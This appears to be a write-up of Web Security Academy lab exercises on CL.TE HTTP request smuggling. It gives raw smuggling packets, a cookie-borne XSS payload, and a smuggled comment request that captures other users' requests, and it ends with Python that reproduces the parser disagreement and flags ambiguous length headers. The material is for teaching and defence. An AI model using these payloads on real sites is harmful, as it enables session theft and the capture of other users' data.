The front end delimits the request body by Content-Length and forwards it through the reverse proxy or load balancer to the back end; the back end gives Transfer-Encoding the higher priority and delimits the body by TE instead, and this disagreement is what creates the security problem.
Send the following packet:
POST / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=
Content-Length: 6
Transfer-Encoding: chunked

0

P
With the CL length at 8, the front end forwards the entire body to the back end. The back end, seeing TE, reads up to 0\r\n\r\n and treats that as the end of the message, so the trailing P stays in its buffer waiting for the next request. When the following packet arrives next:
GET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>
the buffered P is prepended to that request, and the back end sees:
PGET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>
1. Because a Host header can be placed in the second packet, adding our own Host header lets us reach internal resources.
2. Hijack other users' requests. Find a feature that resembles a comment section or message board.
POST / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=
Content-Length: 1031
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
Content-Length: 613
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxx
Note that the CL must be set to exactly the length that splices the next packet onto this one. Then wait for other users to visit the site; suppose the next user's packet looks like this:
GET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>
After splicing, the back end sees:
POST / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=
Content-Length: 1031
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
Content-Length: 613
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxxGET / HTTP/1.1
Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: session=<img src=1 onerror=alert(1)>
Viewing the comment then reveals the other user's request.
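To make the parser disagreement concrete, the following Python (an added example, not code from the original post or the lab) parses one raw request both ways, once by Content-Length as the front end does and once as chunked as the back end does, and returns the bytes the back end would leave buffered; it also includes the front-end check a defender applies, rejecting any request that carries both headers. The sample request is constructed from the post's first packet, and the host name and all function names are assumptions.

```python
# Added example (not the post's code): parse one raw request both ways,
# Content-Length vs chunked, to show the CL.TE desync, plus the front-end check.
# PROBE is a constructed sample modelled on the post's probe; host is a placeholder.
PROBE = (
    b"POST / HTTP/1.1\r\nHost: front-end.example\r\n"
    b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"0\r\n\r\nP"
)

def split_request(raw):
    """Split a raw request into (request line, lowercase header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def body_by_content_length(headers, body):
    """Front-end view: the body is exactly Content-Length bytes."""
    n = int(headers[b"content-length"])
    return body[:n], body[n:]

def body_by_chunked(body):
    """Back-end view: decode chunks up to the zero-size chunk and return
    (decoded body, bytes left over after the terminating empty line)."""
    pos, out = 0, b""
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            pos = body.index(b"\r\n", pos) + 2  # skip the empty trailer line
            return out, body[pos:]
        out += body[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF

def desync_leftover(raw):
    """Bytes a chunked back end keeps buffered after a CL front end forwarded the whole body."""
    _, headers, body = split_request(raw)
    forwarded, _ = body_by_content_length(headers, body)
    _, leftover = body_by_chunked(forwarded)
    return leftover

def is_ambiguous(raw):
    """Front-end mitigation: flag both length headers (RFC 7230 3.3.3 says treat as an error)."""
    _, headers, _ = split_request(raw)
    return b"content-length" in headers and b"transfer-encoding" in headers
```

For PROBE, desync_leftover returns b"P", the byte the post describes being prepended to the next request, and is_ambiguous returns True, which is the condition a hardened front end rejects (or normalises by dropping Content-Length) before forwarding.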